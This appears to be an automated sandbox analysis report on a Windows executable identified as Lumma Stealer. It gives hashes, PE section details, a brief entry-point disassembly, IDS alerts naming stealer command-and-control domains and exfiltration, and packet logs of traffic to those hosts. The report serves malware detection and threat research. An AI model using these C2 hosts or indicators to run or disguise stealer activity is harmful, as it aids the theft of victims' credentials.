	file.exe	Get hash	malicious	Unknown	Browse	104.26.0.100
	SecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	104.21.33.140
	5lg7zd.elf	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.41.39
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	Paiement.eml	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Trojan.PWS.Lumma.749.31391.1681.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	819614 - Midways Freight Ltd.xlsm	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.545206796232912
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'977'280 bytes
MD5:	1d66f9ed00f1c6697066bdaf8cdbe977
SHA1:	261d94ba3f129c901647b51aef7d88bb49febc94
SHA256:	fd3afa72989e02a20d04a5b23f4ad9f242ce5ff3fb32b41b109cc99c33187020
SHA512:	2a65184e6e1e52d5d631ec11918bd4d38efb90435a07991cb78d0747adc213b0920bbd0c7e5a643b8da3c863567ccb9bb6121959d9d871bcfe8ecc13d179c8d2
SSDEEP:	24576:7y7ZmQTvri795Rj0ntAiniDbYJFE26Kc9otILFN3mtk35TubqlIJYtPeaOUgFkVD:29h679wn6in2cT6Ke9jwbHW+sN40k4E
TLSH:	54D55CA17849B1CFD08F26F84627CE8A985D43B60B1609C3E958BC79FD67CC516B6C2C
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.....d.....@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x708000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F86A1794BEAh
cmovl ebp, dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
insd
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
sub al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x59000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x27e00	8f95eda3c4ed7bb4d6c623163ed99d3d	False	0.9980162617554859	data	7.9765168628100795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x340	0x400	914cd139a383496d0085d499d138ef92	False	0.390625	data	4.997389973748798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uzjqkoqp	0x5b000	0x2ac000	0x2ab400	a9f421d7b691575d905ff5bdb079ea0c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mvjdyfsi	0x307000	0x1000	0x400	b2f4de8e4e8e52812e55e7595b5a24b8	False	0.7880859375	data	6.136244580735387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x308000	0x3000	0x2200	59b14bbb79f8f6d3b8afa38219665b49	False	0.08444393382352941	DOS executable (COM)	0.9255585686041298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x59058	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T23:11:09.458593+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.6	56635	1.1.1.1	53	UDP
2024-10-30T23:11:09.481914+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.6	49737	1.1.1.1	53	UDP
2024-10-30T23:11:09.543050+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.6	60573	1.1.1.1	53	UDP
2024-10-30T23:11:09.555540+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.6	63818	1.1.1.1	53	UDP
2024-10-30T23:11:09.570432+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.6	59511	1.1.1.1	53	UDP
2024-10-30T23:11:10.234069+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-10-30T23:11:10.908564+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-10-30T23:11:10.908564+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49709	188.114.97.3	443	TCP
2024-10-30T23:11:11.575725+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49711	188.114.97.3	443	TCP
2024-10-30T23:11:12.263043+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49711	188.114.97.3	443	TCP
2024-10-30T23:11:12.263043+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49711	188.114.97.3	443	TCP
2024-10-30T23:11:13.110467+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49712	188.114.97.3	443	TCP
2024-10-30T23:11:14.448051+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49713	188.114.97.3	443	TCP
2024-10-30T23:11:15.212053+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49713	188.114.97.3	443	TCP
2024-10-30T23:11:16.049790+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49714	188.114.97.3	443	TCP
2024-10-30T23:11:17.640138+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49716	188.114.97.3	443	TCP
2024-10-30T23:11:19.172195+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49722	188.114.97.3	443	TCP
2024-10-30T23:11:21.426725+0100	2057124	ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)	1	192.168.2.6	49739	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 23:11:09.589998007 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:09.590100050 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:09.590179920 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:09.593317032 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:09.593368053 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.233938932 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.234069109 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.237096071 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.237119913 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.237535000 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.285181999 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.414529085 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.414529085 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.414678097 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.908592939 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.908689976 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.908833027 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.910604954 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.910629034 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.910643101 CET	49709	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.910650969 CET	443	49709	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.957518101 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.957587957 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:10.957662106 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.957938910 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:10.957972050 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:11.575603008 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:11.575725079 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:11.576971054 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:11.577004910 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:11.577261925 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:11.578478098 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:11.578517914 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:11.578561068 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263123989 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263278961 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263371944 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263381004 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.263413906 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263470888 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.263478994 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263642073 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.263700008 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.263705969 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.268445969 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.268518925 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.268588066 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.268595934 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.268675089 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.380647898 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.380718946 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.380870104 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.380893946 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.380990028 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.381055117 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.381062031 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.381392002 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.381464958 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.381572008 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.381592989 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.381599903 CET	49711	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.381607056 CET	443	49711	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.480129957 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.480206013 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:12.480339050 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.480643034 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:12.480678082 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.110177040 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.110466957 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.112019062 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.112042904 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.112298965 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.113852024 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.114058971 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.114108086 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.640959024 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.641071081 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.641180992 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.641305923 CET	49712	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.641324043 CET	443	49712	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.822701931 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.822756052 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:13.822838068 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.823229074 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:13.823242903 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:14.447890043 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:14.448050976 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:14.449616909 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:14.449632883 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:14.449872017 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:14.451219082 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:14.451378107 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:14.451412916 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:14.451473951 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:14.451482058 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:15.212129116 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:15.212362051 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:15.212455988 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:15.212565899 CET	49713	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:15.212584972 CET	443	49713	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:15.422070026 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:15.422139883 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:15.422326088 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:15.422599077 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:15.422636032 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.049719095 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.049789906 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.051292896 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.051305056 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.051544905 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.052639008 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.052758932 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.052792072 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.052866936 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.052875042 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.750668049 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.750770092 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:16.750825882 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.750929117 CET	49714	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:16.750943899 CET	443	49714	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.031443119 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.031505108 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.031584978 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.031908989 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.031925917 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.640057087 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.640137911 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.641370058 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.641383886 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.641618013 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:17.642807961 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.642842054 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:17.642847061 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:18.101852894 CET	443	49716	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:18.102159977 CET	49716	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:18.532497883 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:18.532550097 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:18.532624960 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:18.532926083 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:18.532942057 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.172063112 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.172194958 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.173332930 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.173341990 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.173573971 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.174747944 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.175410032 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.175446033 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.175556898 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.175590038 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.176362038 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176403046 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176414967 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.176543951 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176573992 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.176696062 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176728010 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.176852942 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176882982 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.176891088 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.176898003 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.177016020 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.177041054 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.177059889 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.177162886 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.177191973 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.188584089 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.188766956 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.188800097 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:19.188821077 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.188848972 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:19.194325924 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:20.931644917 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:20.931761980 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:20.931839943 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:20.932382107 CET	49722	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:20.932391882 CET	443	49722	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:20.961745024 CET	49739	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:20.961841106 CET	443	49739	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:20.961934090 CET	49739	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:20.962352037 CET	49739	443	192.168.2.6	188.114.97.3
Oct 30, 2024 23:11:20.962388039 CET	443	49739	188.114.97.3	192.168.2.6
Oct 30, 2024 23:11:21.426724911 CET	49739	443	192.168.2.6	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 23:11:09.458592892 CET	56635	53	192.168.2.6	1.1.1.1
Oct 30, 2024 23:11:09.469336987 CET	53	56635	1.1.1.1	192.168.2.6
Oct 30, 2024 23:11:09.481914043 CET	49737	53	192.168.2.6	1.1.1.1
Oct 30, 2024 23:11:09.493012905 CET	53	49737	1.1.1.1	192.168.2.6
Oct 30, 2024 23:11:09.543050051 CET	60573	53	192.168.2.6	1.1.1.1
Oct 30, 2024 23:11:09.554214954 CET	53	60573	1.1.1.1	192.168.2.6
Oct 30, 2024 23:11:09.555540085 CET	63818	53	192.168.2.6	1.1.1.1
Oct 30, 2024 23:11:09.565938950 CET	53	63818	1.1.1.1	192.168.2.6
Oct 30, 2024 23:11:09.570431948 CET	59511	53	192.168.2.6	1.1.1.1
Oct 30, 2024 23:11:09.586196899 CET	53	59511	1.1.1.1	192.168.2.6
Oct 30, 2024 23:11:50.762888908 CET	53	55780	162.159.36.2	192.168.2.6
